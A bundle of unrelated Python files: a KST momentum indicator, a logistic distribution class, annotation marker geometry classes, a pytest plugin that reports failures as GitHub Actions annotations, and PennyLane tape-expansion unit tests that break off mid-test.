sma4 = int(sma4) if sma4 and sma4 > 0 else 15
signal = int(signal) if signal and signal > 0 else 9
_length = max(roc1, roc2, roc3, roc4, sma1, sma2, sma3, sma4, signal)
close = verify_series(close, _length)
drift = get_drift(drift)
offset = get_offset(offset)
if close is None: return
# Calculate Result
rocma1 = roc(close, roc1).rolling(sma1).mean()
rocma2 = roc(close, roc2).rolling(sma2).mean()
rocma3 = roc(close, roc3).rolling(sma3).mean()
rocma4 = roc(close, roc4).rolling(sma4).mean()
kst = 100 * (rocma1 + 2 * rocma2 + 3 * rocma3 + 4 * rocma4)
kst_signal = kst.rolling(signal).mean()
# Offset
if offset != 0:
kst = kst.shift(offset)
kst_signal = kst_signal.shift(offset)
# Handle fills
if "fillna" in kwargs:
kst.fillna(kwargs["fillna"], inplace=True)
kst_signal.fillna(kwargs["fillna"], inplace=True)
if "fill_method" in kwargs:
kst.fillna(method=kwargs["fill_method"], inplace=True)
kst_signal.fillna(method=kwargs["fill_method"], inplace=True)
# Name and Categorize it
kst.name = f"KST_{roc1}_{roc2}_{roc3}_{roc4}_{sma1}_{sma2}_{sma3}_{sma4}"
kst_signal.name = f"KSTs_{signal}"
kst.category = kst_signal.category = "momentum"
# Prepare DataFrame to return
data = {kst.name: kst, kst_signal.name: kst_signal}
kstdf = DataFrame(data)
kstdf.name = f"KST_{roc1}_{roc2}_{roc3}_{roc4}_{sma1}_{sma2}_{sma3}_{sma4}_{signal}"
kstdf.category = "momentum"
return kstdf
kst.__doc__ = \
"""'Know Sure Thing' (KST)
The 'Know Sure Thing' is a momentum based oscillator and based on ROC.
Sources:
https://www.tradingview.com/wiki/Know_Sure_Thing_(KST)
https://www.incrediblecharts.com/indicators/kst.php
Calculation:
Default Inputs:
roc1=10, roc2=15, roc3=20, roc4=30,
sma1=10, sma2=10, sma3=10, sma4=15, signal=9, drift=1
ROC = Rate of Change
SMA = Simple Moving Average
rocsma1 = SMA(ROC(close, roc1), sma1)
rocsma2 = SMA(ROC(close, roc2), sma2)
rocsma3 = SMA(ROC(close, roc3), sma3)
rocsma4 = SMA(ROC(close, roc4), sma4)
KST = 100 * (rocsma1 + 2 * rocsma2 + 3 * rocsma3 + 4 * rocsma4)
KST_Signal = SMA(KST, signal)
Args:
close (pd.Series): Series of 'close's
roc1 (int): ROC 1 period. Default: 10
roc2 (int): ROC 2 period. Default: 15
roc3 (int): ROC 3 period. Default: 20
roc4 (int): ROC 4 period. Default: 30
sma1 (int): SMA 1 period. Default: 10
sma2 (int): SMA 2 period. Default: 10
sma3 (int): SMA 3 period. Default: 10
sma4 (int): SMA 4 period. Default: 15
signal (int): It's period. Default: 9
drift (int): The difference period. Default: 1
offset (int): How many periods to offset the result. Default: 0
Kwargs:
fillna (value, optional): pd.DataFrame.fillna(value)
fill_method (value, optional): Type of fill method
Returns:
pd.DataFrame: kst and kst_signal columns
"""
|
import math as m
import numpy as np
from src.continuous.uniform import UniformDist
from src.prob_distribution import ProbDist
from src.spaces.spaces1d_leafs import ContinuousSpace
class LogisticDist(ProbDist):
"""Simple Logistic distribution."""
def __init__(self, loc = 0, scale = 1):
"""Creates Logistic(loc,scale) distribution.
:param loc Location of the distribution.
:param scale Scale of the distribution
"""
# save params
self.loc = loc
self.scale = scale
# create generator
self.UG = UniformDist()
super().__init__(ContinuousSpace(-np.inf, np.inf))
def expectation(self):
"""Calculates the expectations for that distribution.
:returns The expectation of the distribution"""
return self.loc
def var(self):
"""Calculates the variance for that distribution.
:returns The variance of the distribution"""
return (m.pi ** 2 / 3) * (self.scale ** 2)
def sample(self, num_samples = 1):
"""Generate random numbers from Logistic(loc, scale) by using acceptance rejection distributions.
:param num_samples How many random numbers should be generated.
:returns Random numbers x ~ Logistic(loc, scale).
"""
# shortcut
loc = self.loc
scale = self.scale
# sample data
U = self.UG.sample(num_samples)
X = np.log(U / (1 - U))
return scale * X + loc
def c_pdf(self, x):
"""This method calculates the density Logistic(loc, scale).
:param x Which value should be evaluated.
:returns The probability that this element occurs.
"""
# shortcut
loc = self.loc
scale = self.scale
# update x
xn = np.subtract(x, loc) / scale
t = np.exp(-xn)
b = (1 + t) ** 2
f = t / b
return f / scale
|
"""
Anno values.
General conventions:
- The original marker value from the textual representation is converted to an internal format convenient for algorithms.
The reverse conversion is done by tostring() method. It will return an equivalent representation, which is may differ from
the original one.
- For all markers point test does not include marker's border. For example, a circle with radius of 0 has no points inside.
"""
import abc
import cv2
import numpy as np
class Value:
"""
Base class for marker value.
Derived classes must have the following members:
_image_pose_self: pose of the value.
"""
def __init__(self):
self._a = 0
@staticmethod
def _get_value_as_list(value, expected_length = None):
if type(value) == str:
value = [float(s) for s in value.split()]
if expected_length is not None and len(value) != expected_length:
raise ValueError("Wrong number of values {}, expected {}.".format(len(value), expected_length))
return value
def _make_pose(self, ox, oy, angle):
ca = np.cos(angle)
sa = np.sin(angle)
self._image_pose_self = np.array([[ca, -sa, ox], [sa, ca, oy], [0, 0, 1]], dtype=np.float32)
@property
def image_pose_self(self):
return self._image_pose_self
@property
def o(self):
""" Origin of the coordinate system. """
return self._image_pose_self[:2, 2:].squeeze()
def transform(self, t):
"""
Transform the pose by the matrix t. In other words, the marker is "moved" by the matrix t.
:param t: 3x3 2d homogenous transformation matrix.
"""
self._image_pose_self = np.dot(t, self._image_pose_self)
@property
def a(self):
""" Angle """
return self._a
@a.setter
def a(self, value):
self._a = value
self._make_pose(self.x, self.y, self._a)
@property
def ax(self):
""" X-axis of the coordinate system. """
return self._image_pose_self[:2, 0:1].squeeze()
@property
def ay(self):
""" Y-axis of the coordinate system. """
return self._image_pose_self[:2, 1:2].squeeze()
@property
def x(self):
""" X coordinate of the origin. """
return self._image_pose_self[0, 2]
@x.setter
def x(self, value):
self._image_pose_self[0, 2] = value
@property
def y(self):
""" Y coordinate of the origin. """
return self._image_pose_self[1, 2]
@y.setter
def y(self, value):
self._image_pose_self[1, 2] = value
@property
def angle(self):
return np.arctan2(self._image_pose_self[1, 0], self._image_pose_self[0, 0])
@abc.abstractmethod
def tostring(self, pos_precision=2, angle_precision=4):
"""
Convert to textual representation in anno file format.
:param pos_precision: precision for positional parameters (x, y, sizes, etc.)
:param angle_precision: precision for angular parameters.
:return:
"""
return ''
def write_to_marker(self, marker, pos_precision=2, angle_precision=4):
"""
Writes itself to an anno marker object.
:param marker: marker object.
"""
marker["value"] = self.tostring(pos_precision, angle_precision)
def __str__(self):
return self.tostring()
def _transform_points(self, t, points):
"""
Apply a transform on points.
:param t: a 3x3 homegenous 2d transform matrix.
:param points: a point or an array of points in rows.
:return: a point or an array of transformed points in rows.
"""
p = np.array(points, dtype=np.float32).reshape(-1, 2)
p = np.concatenate((p, np.ones((p.shape[0], 1), dtype=np.float32)), axis=1)
tp = np.dot(p, t.T) # Change order and transpose because the points are not in columns.
tp = tp[:, :2].reshape(points.shape)
return tp
def from_image(self, image_point):
"""
Transform image point to the coordinate system of the self.
:param image_point point in image coordinates
:return point in self coordinate system.
"""
return self._transform_points(np.linalg.inv(self._image_pose_self), image_point)
def to_image(self, self_point):
"""
Transform point(s) in own coordinate system to a point in the image coordinate system.
:param self_point point or array of points in rows in own coordinate system.
:return point or array of points in rows in image coordinate system.
"""
return self._transform_points(self._image_pose_self, self_point)
def distance_from_o(self, point):
"""
Computes distance between point and origin.
:param point point in image coordinates.
:return unsigned distance from origin.
"""
d = np.linalg.norm(point - self.o)
return d
class RectValue(Value):
""" Rect value.
Origin is at the top left corner.
"""
def __init__(self, value):
Value.__init__(self)
value = Value._get_value_as_list(value, 4)
self._make_pose(
min(value[0], value[2]),
min(value[1], value[3]),
0)
self._sx = abs(value[2] - value[0])
self._sy = abs(value[3] - value[1])
@property
def sx(self):
""" X-size (width)."""
return self._sx
@sx.setter
def sx(self, value):
self._sx = value
@property
def sy(self):
""" Y-size (height)."""
return self._sy
@sy.setter
def sy(self, value):
self._sy = value
@property
def br(self):
""" Bottom-right corner (opposite to the origin)."""
return self.o + np.array([self._sx, self._sy])
def contains(self, point):
"""
Checks if a point is inside the marker.
:param point point in image coordinates
:return True, if the point is inside the marker.
"""
p = self.from_image(point)
result = 0 < p[0] and p[0] < self._sx and 0 < p[1] and p[1] < self._sy
return result
def tostring(self, pos_precision=2, angle_precision=4):
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y, self.br[0], self.br[1]]))
class PointValue(Value):
""" Point value. """
def __init__(self, value):
Value.__init__(self)
value = Value._get_value_as_list(value, 2)
self._make_pose(value[0], value[1], 0)
def tostring(self, pos_precision=2, angle_precision=None):
"""
Write marker to string.
:param pos_precision: position precision.
:param angle_precision: not used.
:return:
"""
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y]))
class OrientedPointValue(Value):
""" OrientedPoint value. """
def __init__(self, value):
Value.__init__(self)
value = Value._get_value_as_list(value, 3)
self._a = value[2]
self._make_pose(value[0], value[1], value[2])
def tostring(self, pos_precision=2, angle_precision=4):
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
fmt_angle = '{:0.' + str(angle_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y])) + " " + fmt_angle.format(self.angle)
class OrientedRectValue(Value):
""" OrientedRect value.
It's origin is in the center of the rectangle.
"""
def __init__(self, value):
"""
Create object.
:param value: [origin_x, origin_y, size_x, size_y, angle]
"""
Value.__init__(self)
value = Value._get_value_as_list(value, 5)
self._a = value[4]
self._make_pose(value[0], value[1], value[4])
self._sx = value[2]
self._sy = value[3]
@property
def sx(self):
""" X-size (width) of the rectangle. """
return self._sx
@sx.setter
def sx(self, value):
self._sx = value
@property
def sy(self):
""" Y-size, (height) of the rectangle. """
return self._sy
@sy.setter
def sy(self, value):
self._sy = value
def contains(self, point):
"""
Checks if a point is inside the marker.
:param point point in image coordinates
:return True, if the point is inside the marker.
"""
p = np.abs(self.from_image(point) * 2)
result = p[0] < self._sx and p[1] < self._sy
return result
def tostring(self, pos_precision=2, angle_precision=4):
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
fmt_angle = '{:0.' + str(angle_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y, self.sx, self.sy])) + \
" " + fmt_angle.format(self.angle)
class CircleValue(Value):
""" OrientedRect value. """
def __init__(self, value):
Value.__init__(self)
value = Value._get_value_as_list(value, 3)
self._make_pose(value[0], value[1], 0)
self._r = value[2]
@property
def r(self):
""" Radius)."""
return self._r
@r.setter
def r(self, value):
self._r = value
def contains(self, point):
"""
Checks if a point is inside the marker.
:param point point in image coordinates
:return True, if the point is inside the marker.
"""
d = self.distance_from_o(point)
return d < self._r
def tostring(self, pos_precision=2, angle_precision=4):
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y, self._r]))
class PolygonValue(Value):
""" Polygon value. """
def __init__(self, value, children=None):
"""
Create a new instance.
:param value: a string or a list of floats for outer contour.
:param children: a list of children (inner contours aka holes):
- strings
- lists of floats
- dictionaries as in anno files: {'value': value}
Internal representation is a list or np.arrays [*, 2] self._poly.
self._poly[0] is the outer contour. The optional rest are children (holes).
"""
Value.__init__(self)
self._poly = [np.array(Value._get_value_as_list(value), dtype=np.float32).reshape(-1, 2)]
if children is not None:
for child in children:
if type(child) == dict:
child_value = child["value"]
else:
child_value = child
child_value = np.array(Value._get_value_as_list(child_value), dtype=np.float32).reshape(-1, 2)
self._poly.append(child_value)
self._bounds = np.array([
np.min(self._poly[0], axis=0),
np.max(self._poly[0], axis=0)],
dtype=np.float32)
self._make_pose(0, 0, 0)
@property
def bounds(self):
"""
Gets bounds of the polygon.
:return: numpy array [[min_x, min_y], [max_x, max_y]].
"""
return self._bounds
def fill(self, image, color):
int_poly = []
for p in self._poly:
int_poly.append(np.round(p).astype(np.int32))
cv2.fillPoly(image, int_poly, color=color)
def contains(self, point):
"""
Checks if a point is inside the marker.
:param point point in image coordinates
:return True, if the point is inside the marker.
"""
point = tuple(point)
if point[0] <= self._bounds[0][0] or point[1] <= self._bounds[0][1]:
return False
if point[0] >= self._bounds[1][0] or point[1] >= self._bounds[1][1]:
return False
if cv2.pointPolygonTest(self._poly[0], point, measureDist=False) <= 0:
return False
for hole in self._poly[1:]:
if cv2.pointPolygonTest(hole, point, measureDist=False) >= 0:
return False
return True
def distance_to_point(self, point):
"""
Measures distance from the border to the point.
:param point point in image coordinates
:return distance. Positive is inside the polygon, negative - outside.
"""
point = tuple(point)
dist = cv2.pointPolygonTest(self._poly[0], point, measureDist=True)
if dist <= 0:
# Point is outside of outer polygon
return dist
for hole in self._poly[1:]:
inner_dist = cv2.pointPolygonTest(hole, point, measureDist=True)
if inner_dist >= 0:
# Point is in the hole
return -inner_dist
dist = min(dist, -inner_dist)
return dist
def tostring(self, pos_precision=2):
"""
Convert to string representation.
:return: Returns a list of strings, the first element corresponds to the outer contour,
the rest to the children.
"""
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
def points_to_string(points):
return " ".join(map(lambda x: fmt_pos.format(x), list(points.ravel())))
strings = list(map(points_to_string, self._poly))
return strings
def write_to_marker(self, marker, pos_precision=2, angle_precision=4):
text = self.tostring(pos_precision, angle_precision)
marker["value"] = text[0]
if len(text) > 0:
marker["children"] = list(map(lambda x: {"value": x}, text[1:]))
def __str__(self):
return str(self.tostring())
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from collections import OrderedDict
# Reference:
# https://docs.pytest.org/en/latest/writing_plugins.html#hookwrapper-executing-around-other-hooks
# https://docs.pytest.org/en/latest/writing_plugins.html#hook-function-ordering-call-example
# https://docs.pytest.org/en/stable/reference.html#pytest.hookspec.pytest_runtest_makereport
#
# Inspired by:
# https://github.com/pytest-dev/pytest/blob/master/src/_pytest/terminal.py
def pytest_runtest_logreport(report):
# enable only in a workflow of GitHub Actions
# ref: https://help.github.com/en/actions/configuring-and-managing-workflows/using-environment-variables#default-environment-variables
if os.environ.get("GITHUB_ACTIONS") != "true":
return
if report.when == "call" and report.failed:
# collect information to be annotated
filesystempath, lineno, _ = report.location
runpath = os.environ.get("PYTEST_RUN_PATH")
if runpath:
filesystempath = os.path.join(runpath, filesystempath)
# try to convert to absolute path in GitHub Actions
workspace = os.environ.get("GITHUB_WORKSPACE")
if workspace:
full_path = os.path.abspath(filesystempath)
try:
rel_path = os.path.relpath(full_path, workspace)
except ValueError:
# os.path.relpath() will raise ValueError on Windows
# when full_path and workspace have different mount points.
# https://github.com/utgwkk/pytest-github-actions-annotate-failures/issues/20
rel_path = filesystempath
if not rel_path.startswith(".."):
filesystempath = rel_path
if lineno is not None:
# 0-index to 1-index
lineno += 1
# get the name of the current failed test, with parametrize info
longrepr = report.head_line or report.nodeid
# get the error message and line number from the actual error
try:
longrepr += "\n\n" + report.longrepr.reprcrash.message
lineno = report.longrepr.reprcrash.lineno
except AttributeError:
pass
print(
_error_workflow_command(filesystempath, lineno, longrepr), file=sys.stderr
)
def _error_workflow_command(filesystempath, lineno, longrepr):
# Build collection of arguments. Ordering is strict for easy testing
details_dict = OrderedDict()
details_dict["file"] = filesystempath
if lineno is not None:
details_dict["line"] = lineno
details = ",".join("{}={}".format(k, v) for k, v in details_dict.items())
if longrepr is None:
return "\n::error {}".format(details)
else:
longrepr = _escape(longrepr)
return "\n::error {}::{}".format(details, longrepr)
def _escape(s):
return s.replace("%", "%25").replace("\r", "%0D").replace("\n", "%0A")
|
# Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for tape expansion stopping criteria and expansion functions.
"""
import pytest
import numpy as np
import pennylane as qml
from pennylane.wires import Wires
class TestCreateExpandFn:
"""Test creating expansion functions from stopping criteria."""
crit_0 = (~qml.operation.is_trainable) | (qml.operation.has_gen & qml.operation.is_trainable)
doc_0 = "Test docstring."
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.RY(qml.numpy.array(2.1, requires_grad=True), wires=1)
qml.Rot(*qml.numpy.array([0.5, 0.2, -0.1], requires_grad=True), wires=0)
def test_create_expand_fn(self):
"""Test creation of expand_fn."""
expand_fn = qml.transforms.create_expand_fn(
depth=10,
stop_at=self.crit_0,
docstring=self.doc_0,
)
assert expand_fn.__doc__ == "Test docstring."
def test_create_expand_fn_expansion(self):
"""Test expansion with created expand_fn."""
expand_fn = qml.transforms.create_expand_fn(depth=10, stop_at=self.crit_0)
new_tape = expand_fn(self.tape)
assert new_tape.operations[0] == self.tape.operations[0]
assert new_tape.operations[1] == self.tape.operations[1]
assert [op.name for op in new_tape.operations[2:]] == ["RZ", "RY", "RZ"]
assert np.allclose([op.data for op in new_tape.operations[2:]], [[0.5], [0.2], [-0.1]])
assert [op.wires for op in new_tape.operations[2:]] == [qml.wires.Wires(0)] * 3
def test_create_expand_fn_dont_expand(self):
"""Test expansion is skipped with depth=0."""
expand_fn = qml.transforms.create_expand_fn(depth=0, stop_at=self.crit_0)
new_tape = expand_fn(self.tape)
assert new_tape.operations == self.tape.operations
def test_device_and_stopping_expansion(self, mocker):
"""Test that passing a device alongside a stopping condition ensures
that all operations are expanded to match the devices default gate
set"""
dev = qml.device("default.qubit", wires=1)
expand_fn = qml.transforms.create_expand_fn(device=dev, depth=10, stop_at=self.crit_0)
with qml.tape.JacobianTape() as tape:
qml.U1(0.2, wires=0)
qml.Rot(*qml.numpy.array([0.5, 0.2, -0.1], requires_grad=True), wires=0)
spy_device = mocker.spy(dev, "supports_operation")
new_tape = expand_fn(tape)
spy_device.assert_called()
assert new_tape.operations[0].name == "PhaseShift"
assert [op.name for op in new_tape.operations[1:]] == ["RZ", "RY", "RZ"]
def test_device_only_expansion(self, mocker):
"""Test that passing a device ensures that all operations are expanded
to match the devices default gate set"""
dev = qml.device("default.qubit", wires=1)
expand_fn = qml.transforms.create_expand_fn(device=dev, depth=10)
with qml.tape.JacobianTape() as tape:
qml.U1(0.2, wires=0)
qml.Rot(*qml.numpy.array([0.5, 0.2, -0.1], requires_grad=True), wires=0)
spy_device = mocker.spy(dev, "supports_operation")
new_tape = expand_fn(tape)
spy_device.assert_called()
assert len(new_tape.operations) == 2
assert new_tape.operations[0].name == "PhaseShift"
assert new_tape.operations[1].name == "Rot"
def test_depth_only_expansion(self):
"""Test that passing a depth simply expands to that depth"""
dev = qml.device("default.qubit", wires=0)
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.RY(qml.numpy.array(2.1, requires_grad=True), wires=1)
qml.Rot(*qml.numpy.array([0.5, 0.2, -0.1], requires_grad=True), wires=0)
qml.templates.StronglyEntanglingLayers(
qml.numpy.ones([2, 2, 3], requires_grad=True), wires=[0, 1]
)
expand_fn = qml.transforms.create_expand_fn(depth=0)
new_tape = expand_fn(tape)
assert new_tape is tape
expand_fn = qml.transforms.create_expand_fn(depth=10)
new_tape = expand_fn(tape)
assert new_tape.operations[0] == tape.operations[0]
assert new_tape.operations[1] == tape.operations[1]
assert [op.name for op in new_tape.operations[2:5]] == ["RZ", "RY", "RZ"]
assert len(new_tape.operations[6:]) == 15
class TestExpandMultipar:
"""Test the expansion of multi-parameter gates."""
def test_expand_multipar(self):
"""Test that a multi-parameter gate is decomposed correctly.
And that single-parameter gates are not decomposed."""
dev = qml.device("default.qubit", wires=3)
class _CRX(qml.CRX):
name = "_CRX"
@staticmethod
def decomposition(theta, wires):
raise NotImplementedError()
with qml.tape.QuantumTape() as tape:
qml.RX(1.5, wires=0)
qml.Rot(-2.1, 0.2, -0.418, wires=1)
_CRX(1.5, wires=[0, 2])
new_tape = qml.transforms.expand_multipar(tape)
new_ops = new_tape.operations
assert [op.name for op in new_ops] == ["RX", "RZ", "RY", "RZ", "_CRX"]
def test_no_generator_expansion(self):
"""Test that a gate is decomposed correctly if it has
generator[0]==None."""
dev = qml.device("default.qubit", wires=3)
class _CRX(qml.CRX):
def generator(self):
raise qml.operations.GeneratorUndefinedError()
with qml.tape.QuantumTape() as tape:
qml.RX(1.5, wires=0)
qml.RZ(-2.1, wires=1)
qml.RY(0.2, wires=1)
qml.RZ(-0.418, wires=1)
_CRX(1.5, wires=[0, 2])
new_tape = qml.transforms.expand_multipar(tape)
new_ops = new_tape.operations
expected = ["RX", "RZ", "RY", "RZ", "RZ", "RY", "CNOT", "RY", "CNOT", "RZ"]
assert [op.name for op in new_ops] == expected
class TestExpandNonunitaryGen:
"""Test the expansion of operations without a unitary generator."""
def test_do_not_expand(self):
"""Test that a tape with single-parameter operations with
unitary generators and non-parametric operations is not touched."""
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.Hadamard(0)
qml.PauliRot(0.9, "XY", wires=[0, 1])
qml.SingleExcitationPlus(-1.2, wires=[1, 0])
new_tape = qml.transforms.expand_nonunitary_gen(tape)
assert tape.operations == new_tape.operations
def test_expand_multi_par(self):
"""Test that a tape with single-parameter operations with
unitary generators and non-parametric operations is not touched."""
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.Hadamard(0)
qml.Rot(0.9, 1.2, -0.6, wires=0)
qml.SingleExcitationPlus(-1.2, wires=[1, 0])
new_tape = qml.transforms.expand_nonunitary_gen(tape)
expanded = [
qml.RZ(0.9, wires=0),
qml.RY(1.2, wires=0),
qml.RZ(-0.6, wires=0),
]
assert tape.operations[:2] == new_tape.operations[:2]
assert all(exp.name == new.name for exp, new in zip(expanded, new_tape.operations[2:5]))
assert all(exp.data == new.data for exp, new in zip(expanded, new_tape.operations[2:5]))
assert all(exp.wires == new.wires for exp, new in zip(expanded, new_tape.operations[2:5]))
assert tape.operations[3:] == new_tape.operations[5:]
def test_expand_missing_generator(self):
"""Test that a tape with single-parameter operations with
unitary generators and non-parametric operations is not touched."""
class _PhaseShift(qml.PhaseShift):
def generator(self):
return None
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.Hadamard(0)
_PhaseShift(2.1, wires=1)
qml.SingleExcitationPlus(-1.2, wires=[1, 0])
new_tape = qml.transforms.expand_nonunitary_gen(tape)
assert tape.operations[:2] == new_tape.operations[:2]
exp_op = new_tape.operations[2]
assert exp_op.name == "RZ" and exp_op.data == [2.1] and exp_op.wires == qml.wires.Wires(1)
assert tape.operations[3:] == new_tape.operations[3:]
def test_expand_nonunitary_generator(self):
"""Test that a tape with single-parameter operations with
unitary generators and non-parametric operations is not touched."""
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.Hadamard(0)
qml.PhaseShift(2.1, wires=1)
qml.SingleExcitationPlus(-1.2, wires=[1, 0])
new_tape = qml.transforms.expand_nonunitary_gen(tape)
assert tape.operations[:2] == new_tape.operations[:2]
exp_op = new_tape.operations[2]
assert exp_op.name == "RZ" and exp_op.data == [2.1] and exp_op.wires == qml.wires.Wires(1)
assert tape.operations[3:] == new_tape.operations[3:]
class TestExpandInvalidTrainable:
"""Tests for the gradient expand function"""
def test_no_expansion(self, mocker):
"""Test that a circuit with differentiable
operations is not expanded"""
x = qml.numpy.array(0.2, requires_grad=True)
y = qml.numpy.array(0.1, requires_grad=True)
with qml.tape.QuantumTape() as tape:
qml.RX(x, wires=0)
qml.RY(y, wires=1)
qml.CNOT(wires=[0, 1])
qml.expval(qml.PauliZ(0))
spy = mocker.spy(tape, "expand")
new_tape = qml.transforms.expand_invalid_trainable(tape)
assert new_tape is tape
spy.assert_not_called()
def test_trainable_nondiff_expansion(self, mocker):
"""Test that a circuit with non-differentiable
trainable operations is expanded"""
x = qml.numpy.array(0.2, requires_grad=True)
y = qml.numpy.array(0.1, requires_grad=True)
class NonDiffPhaseShift(qml.PhaseShift):
grad_method = None
with qml.tape.QuantumTape() as tape:
NonDiffPhaseShift(x, wires=0)
qml.RY(y, wires=1)
qml.CNOT(wires=[0, 1])
qml.expval(qml.PauliZ(0))
spy = mocker.spy(tape, "expand")
new_tape = qml.transforms.expand_invalid_trainable(tape)
assert new_tape is not tape
spy.assert_called()
new_tape.operations[0].name == "RZ"
new_tape.operations[0].grad_method == "A"
new_tape.operations[1].name == "RY"
new_tape.operations[2].name == "CNOT"
def test_nontrainable_nondiff(self, mocker):
"""Test that a circuit with non-differentiable
non-trainable operations is not expanded"""
x = qml.numpy.array(0.2, requires_grad=False)
y = qml.numpy.array(0.1, requires_grad=True)
class NonDiffPhaseShift(qml.PhaseShift):
grad_method = None
with qml.tape.QuantumTape() as tape:
NonDiffPhaseShift(x, wires=0)
qml.RY(y, wires=1)
qml.CNOT(wires=[0, 1])
qml.expval(qml.PauliZ(0))
params = tape.get_parameters(trainable_only=False)
tape.trainable_params = qml.math.get_trainable_indices(params)
assert tape.trainable_params == [1]
spy = mocker.spy(tape, "expand")
new_tape = qml.transforms.expand_invalid_trainable(tape)
assert new_tape is tape
spy.assert_not_called()
def test_trainable_numeric(self, mocker):
"""Test that a circuit with numeric differentiable
trainable operations is *not* expanded"""
x = qml.numpy.array(0.2, requires_grad=True)
y = qml.numpy.array(0.1, requires_grad=True)
class NonDiffPhaseShift(qml.PhaseShift):
grad_method = "F"
with qml.tape.QuantumTape() as tape:
NonDiffPhaseShift(x, wires=0)
qml.RY(y, wires=1)
qml.CNOT(wires=[0, 1])
qml.expval(qml.PauliZ(0))
spy = mocker.spy(tape, "expand")
new_tape = qml.transforms.expand_invalid_trainable(tape)
assert new_tape is tape
spy.assert_not_called()
# Custom decomposition functions for testing.
def custom_cnot(wires):
return [
qml.Hadamard(wires=wires[1]),
qml.CZ(wires=[wires[0], wires[1]]),
qml.Hadamard(wires=wires[1]),
]
def custom_hadamard(wires):
return [qml.RZ(np.pi, wires=wires), qml.RY(np.pi / 2, wires=wires)]
# Incorrect, for testing purposes only
def custom_rx(params, wires):
return [qml.RY(params, wires=wires), qml.Hadamard(wires=wires)]
# To test the gradient; use circuit identity RY(theta) = X RY(-theta) X
def custom_rot(phi, theta, omega, wires):
return [
qml.RZ(phi, wires=wires),
qml.PauliX(wires=wires),
qml.RY(-theta, wires=wires),
qml.PauliX(wires=wires),
qml.RZ(omega, wires=wires),
]
# Decompose a template into another template
def custom_basic_entangler_layers(weights, wires, **kwargs):
return [
qml.AngleEmbedding(weights[0], wires=wires),
qml.broadcast(qml.CNOT, pattern="ring", wires=wires),
]
class TestCreateCustomDecompExpandFn:
"""Tests for the gradient expand function"""
def test_no_custom_decomp(self):
"""Test that sending an empty dictionary results in no decompositions."""
def circuit():
qml.Hadamard(wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0))
original_dev = qml.device("default.qubit", wires=3)
decomp_dev = qml.device("default.qubit", wires=3, custom_decomps={})
original_qnode = qml.QNode(circuit, original_dev, expansion_strategy="device")
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
original_res = original_qnode()
decomp_res = decomp_qnode()
assert np.isclose(original_res, decomp_res)
assert [
orig_op.name == decomp_op.name
for orig_op, decomp_op in zip(
original_qnode.qtape.operations, decomp_qnode.qtape.operations
)
]
def test_no_custom_decomp_template(self):
"""Test that sending an empty dictionary results in no decomposition
when a template is involved, except the decomposition expected from the device."""
def circuit():
qml.BasicEntanglerLayers([[0.1, 0.2]], wires=[0, 1])
return qml.expval(qml.PauliZ(0))
original_dev = qml.device("default.qubit", wires=3)
decomp_dev = qml.device("default.qubit", wires=3, custom_decomps={})
original_qnode = qml.QNode(circuit, original_dev, expansion_strategy="device")
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
original_res = original_qnode()
decomp_res = decomp_qnode()
assert np.isclose(original_res, decomp_res)
assert [
orig_op.name == decomp_op.name
for orig_op, decomp_op in zip(
original_qnode.qtape.operations, decomp_qnode.qtape.operations
)
]
@pytest.mark.parametrize("device_name", ["default.qubit", "lightning.qubit"])
def test_one_custom_decomp(self, device_name):
"""Test that specifying a single custom decomposition works as expected."""
def circuit():
qml.Hadamard(wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0))
custom_decomps = {"Hadamard": custom_hadamard}
decomp_dev = qml.device(device_name, wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 3
assert decomp_ops[0].name == "RZ"
assert np.isclose(decomp_ops[0].parameters[0], np.pi)
assert decomp_ops[1].name == "RY"
assert np.isclose(decomp_ops[1].parameters[0], np.pi / 2)
assert decomp_ops[2].name == "CNOT"
def test_no_decomp_with_depth_zero(self):
"""Test that specifying a single custom decomposition works as expected."""
def circuit():
qml.Hadamard(wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0))
custom_decomps = {"Hadamard": custom_hadamard, "CNOT": custom_cnot}
decomp_dev = qml.device(
"default.qubit", wires=2, custom_decomps=custom_decomps, decomp_depth=0
)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 2
assert decomp_ops[0].name == "Hadamard"
assert decomp_ops[1].name == "CNOT"
def test_one_custom_decomp_gradient(self):
"""Test that gradients are still correctly computed after a decomposition
that performs transpilation."""
def circuit(x):
qml.Hadamard(wires=0)
qml.Rot(x[0], x[1], x[2], wires=0)
